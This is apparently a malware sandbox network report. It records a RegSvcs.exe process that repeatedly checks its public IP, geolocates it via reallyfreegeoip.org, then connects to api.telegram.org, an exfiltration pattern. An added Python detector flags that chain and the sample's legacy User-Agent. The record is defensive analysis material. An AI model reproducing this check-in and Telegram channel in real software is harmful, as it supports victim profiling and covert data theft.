                                                                                                                  Jan 10, 2025 20:37:51.472289085 CET4975280192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:51.473263979 CET4976480192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:51.477298975 CET8049752132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:51.477395058 CET4975280192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:51.478070021 CET8049764132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:51.478144884 CET4976480192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:51.478260040 CET4976480192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:51.483043909 CET8049764132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:52.150430918 CET8049764132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:52.151958942 CET49770443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:52.152004004 CET44349770104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:52.152092934 CET49770443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:52.152390957 CET49770443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:52.152405024 CET44349770104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:52.192238092 CET4976480192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:52.621220112 CET44349770104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:52.622936964 CET49770443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:52.622973919 CET44349770104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:52.752660036 CET44349770104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:52.752871037 CET44349770104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:52.752948999 CET49770443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:52.753345013 CET49770443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:52.756431103 CET4976480192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:52.757625103 CET4977680192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:52.761544943 CET8049764132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:52.761622906 CET4976480192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:52.762444973 CET8049776132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:52.762511969 CET4977680192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:52.762599945 CET4977680192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:52.767330885 CET8049776132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:53.454581976 CET8049776132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:53.455905914 CET49782443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:53.455944061 CET44349782104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:53.456012964 CET49782443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:53.456252098 CET49782443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:53.456263065 CET44349782104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:53.504580975 CET4977680192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:53.915822029 CET44349782104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:53.917849064 CET49782443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:53.917885065 CET44349782104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:54.059377909 CET44349782104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:54.059421062 CET44349782104.21.112.1192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:54.060204983 CET49782443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:54.062469959 CET49782443192.168.2.6104.21.112.1
                                                                                                                  Jan 10, 2025 20:37:54.109118938 CET4977680192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:54.114078045 CET8049776132.226.247.73192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:54.114135981 CET4977680192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:37:54.116293907 CET49787443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 20:37:54.116317034 CET44349787149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:54.116360903 CET49787443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 20:37:54.120287895 CET49787443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 20:37:54.120300055 CET44349787149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:54.735423088 CET44349787149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:54.735567093 CET49787443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 20:37:54.739479065 CET49787443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 20:37:54.739490986 CET44349787149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:54.739873886 CET44349787149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:54.741916895 CET49787443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 20:37:54.787331104 CET44349787149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:54.985490084 CET44349787149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:54.985565901 CET44349787149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 20:37:54.985690117 CET49787443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 20:37:54.991056919 CET49787443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 20:38:00.493238926 CET4971480192.168.2.6132.226.247.73
                                                                                                                  Jan 10, 2025 20:38:00.661494017 CET49830443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 20:38:00.661526918 CET44349830149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 20:38:00.661602020 CET49830443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 20:38:00.661850929 CET49830443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 20:38:00.661864042 CET44349830149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 20:38:01.277432919 CET44349830149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 20:38:01.291018009 CET49830443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 20:38:01.291045904 CET44349830149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 20:38:01.291117907 CET49830443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 20:38:01.291129112 CET44349830149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 20:38:01.600116014 CET44349830149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 20:38:01.600195885 CET44349830149.154.167.220192.168.2.6
                                                                                                                  Jan 10, 2025 20:38:01.600238085 CET49830443192.168.2.6149.154.167.220
                                                                                                                  Jan 10, 2025 20:38:01.600744963 CET49830443192.168.2.6149.154.167.220
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 10, 2025 20:37:41.962207079 CET | 64857 | 53 | 192.168.2.6 | 1.1.1.1
Jan 10, 2025 20:37:41.969078064 CET | 53 | 64857 | 1.1.1.1 | 192.168.2.6
Jan 10, 2025 20:37:42.997613907 CET | 53321 | 53 | 192.168.2.6 | 1.1.1.1
Jan 10, 2025 20:37:43.005613089 CET | 53 | 53321 | 1.1.1.1 | 192.168.2.6
Jan 10, 2025 20:37:54.108992100 CET | 52373 | 53 | 192.168.2.6 | 1.1.1.1
Jan 10, 2025 20:37:54.115575075 CET | 53 | 52373 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 10, 2025 20:37:41.962207079 CET | 192.168.2.6 | 1.1.1.1 | 0xc452 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:37:42.997613907 CET | 192.168.2.6 | 1.1.1.1 | 0xe68 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:37:54.108992100 CET | 192.168.2.6 | 1.1.1.1 | 0x9fba | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 10, 2025 20:37:41.969078064 CET | 1.1.1.1 | 192.168.2.6 | 0xc452 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 20:37:41.969078064 CET | 1.1.1.1 | 192.168.2.6 | 0xc452 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:37:41.969078064 CET | 1.1.1.1 | 192.168.2.6 | 0xc452 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:37:41.969078064 CET | 1.1.1.1 | 192.168.2.6 | 0xc452 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:37:41.969078064 CET | 1.1.1.1 | 192.168.2.6 | 0xc452 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:37:41.969078064 CET | 1.1.1.1 | 192.168.2.6 | 0xc452 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:37:43.005613089 CET | 1.1.1.1 | 192.168.2.6 | 0xe68 | No error (0) | reallyfreegeoip.org | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:37:43.005613089 CET | 1.1.1.1 | 192.168.2.6 | 0xe68 | No error (0) | reallyfreegeoip.org | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:37:43.005613089 CET | 1.1.1.1 | 192.168.2.6 | 0xe68 | No error (0) | reallyfreegeoip.org | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:37:43.005613089 CET | 1.1.1.1 | 192.168.2.6 | 0xe68 | No error (0) | reallyfreegeoip.org | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:37:43.005613089 CET | 1.1.1.1 | 192.168.2.6 | 0xe68 | No error (0) | reallyfreegeoip.org | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:37:43.005613089 CET | 1.1.1.1 | 192.168.2.6 | 0xe68 | No error (0) | reallyfreegeoip.org | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:37:43.005613089 CET | 1.1.1.1 | 192.168.2.6 | 0xe68 | No error (0) | reallyfreegeoip.org | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 20:37:54.115575075 CET | 1.1.1.1 | 192.168.2.6 | 0x9fba | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                                                                                                  • reallyfreegeoip.org
                                                                                                                  • api.telegram.org
                                                                                                                  • checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49710 | 132.226.247.73 | 80 | 1340 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 20:37:41.980315924 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Connection: Keep-Alive
Jan 10, 2025 20:37:42.740592957 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 19:37:42 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 20:37:42.744561911 CET | 127 | OUT | GET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
Jan 10, 2025 20:37:42.958389997 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 19:37:42 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 20:37:43.702404976 CET | 127 | OUT | GET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
Jan 10, 2025 20:37:43.917732000 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 19:37:43 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
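The traffic above follows a fixed order: RegSvcs.exe fetches its public IP from checkip.dyndns.org (with a hard-coded IE6 / ".NET CLR1.0.3705" User-Agent and no other request headers), resolves reallyfreegeoip.org for geolocation, and only then contacts api.telegram.org. The following is an added example, not part of the Joe Sandbox report, showing how a detector can key on that ordered chain rather than on any single host, since each hop is harmless on its own. The events are constructed inline from the DNS query and HTTP session rows in this report; the 60-second window and the exact User-Agent pattern are assumptions drawn from this one capture.

```python
"""Chain detector for the check-in sequence recorded in this report.

Added example, not part of the Joe Sandbox output. It reads DNS queries and
HTTP requests (constructed inline from the rows above) and reports when a host
resolves checkip.dyndns.org, then reallyfreegeoip.org, then api.telegram.org
inside one short window, plus any request carrying the hard-coded legacy
User-Agent string seen in the HTTP sessions.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class Event:
    ts: datetime
    kind: str    # "dns" for a query, "http" for a request
    host: str    # queried name, or the HTTP Host header
    detail: str  # DNS record type, or the HTTP User-Agent


def parse_ts(s: str) -> datetime:
    """Parse 'Jan 10, 2025 20:37:41.962207079 CET'. The report prints nine
    fractional digits; strptime's %f accepts at most six, so truncate."""
    head, frac = s.replace(" CET", "").rsplit(".", 1)
    return datetime.strptime(f"{head}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


# Constructed input: the three DNS queries and the first HTTP request from the
# tables in this report, reduced to the fields the detector needs.
SAMPLE_DNS = [
    ("Jan 10, 2025 20:37:41.962207079 CET", "checkip.dyndns.org", "A"),
    ("Jan 10, 2025 20:37:42.997613907 CET", "reallyfreegeoip.org", "A"),
    ("Jan 10, 2025 20:37:54.108992100 CET", "api.telegram.org", "A"),
]
SAMPLE_HTTP = [
    ("Jan 10, 2025 20:37:41.980315924 CET", "checkip.dyndns.org",
     "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"),
]

# Ordered stages of the check-in: public IP, geolocation, exfil channel.
STAGES = ("checkip.dyndns.org", "reallyfreegeoip.org", "api.telegram.org")
# Assumption: a real check-in completes well inside 60 s (about 12 s here).
DEFAULT_WINDOW_S = 60.0
# Exact User-Agent from the captured requests. Note "CLR1.0.3705" without a
# space after CLR, which is not how Internet Explorer formats that token.
LEGACY_UA = re.compile(
    r"^Mozilla/4\.0 \(compatible; MSIE 6\.0; Windows NT 5\.2; \.NET CLR1\.0\.3705;\)$"
)


def load_events(dns_rows, http_rows) -> list[Event]:
    """Merge DNS and HTTP rows into one time-ordered event stream."""
    events = [Event(parse_ts(t), "dns", h, rt) for t, h, rt in dns_rows]
    events += [Event(parse_ts(t), "http", h, ua) for t, h, ua in http_rows]
    return sorted(events, key=lambda e: e.ts)


def detect_checkin_chain(events: list[Event], window_s: float = DEFAULT_WINDOW_S):
    """Return (first_ts, last_ts) of the earliest complete STAGES chain whose
    events occur in order within window_s seconds, else None."""
    window = timedelta(seconds=window_s)
    for i, start in enumerate(events):
        if start.host != STAGES[0]:
            continue
        idx = 1
        for ev in events[i + 1:]:
            if ev.ts - start.ts > window:
                break  # this start is stale; try the next candidate start
            if ev.host == STAGES[idx]:
                idx += 1
                if idx == len(STAGES):
                    return start.ts, ev.ts
    return None


def flag_legacy_ua(events: list[Event]) -> list[str]:
    """Hosts contacted with the hard-coded legacy User-Agent string."""
    return sorted({e.host for e in events
                   if e.kind == "http" and LEGACY_UA.match(e.detail)})


if __name__ == "__main__":
    evs = load_events(SAMPLE_DNS, SAMPLE_HTTP)
    print("check-in chain:", detect_checkin_chain(evs))
    print("legacy UA hosts:", flag_legacy_ua(evs))
```

Run stand-alone it reports the chain spanning 20:37:41.962 to 20:37:54.108 and checkip.dyndns.org as the host hit with the legacy User-Agent. The chain match is deliberately per-start-event: a Telegram lookup that precedes the IP check, or one that arrives long after it, does not fire, which keeps ordinary Telegram clients and ordinary "what is my IP" visits out of the alert.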


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49714 | 132.226.247.73 | 80 | 1340 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 20:37:44.578048944 CET | 127 | OUT | GET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                  Host: checkip.dyndns.org
                                                                                                                  Jan 10, 2025 20:37:45.253782988 CET273INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 19:37:45 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 104
                                                                                                                  Connection: keep-alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49721 | 132.226.247.73 | 80 | 1340 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 20:37:45.934077024 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 20:37:46.777050972 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 19:37:46 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49733 | 132.226.247.73 | 80 | 1340 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 20:37:47.379661083 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 20:37:48.083070040 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 19:37:47 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49744 | 132.226.247.73 | 80 | 1340 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 20:37:48.725141048 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 20:37:49.419161081 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 19:37:49 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49752 | 132.226.247.73 | 80 | 1340 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 20:37:50.061391115 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 20:37:50.861355066 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 19:37:50 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 49764 | 132.226.247.73 | 80 | 1340 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 20:37:51.478260040 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 20:37:52.150430918 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 19:37:52 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 49776 | 132.226.247.73 | 80 | 1340 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 20:37:52.762599945 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 20:37:53.454581976 CET | 273 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 19:37:53 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49711 | 104.21.112.1 | 443 | 1340 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 19:37:43 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-10 19:37:43 UTC | 859 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 19:37:43 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1852652
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
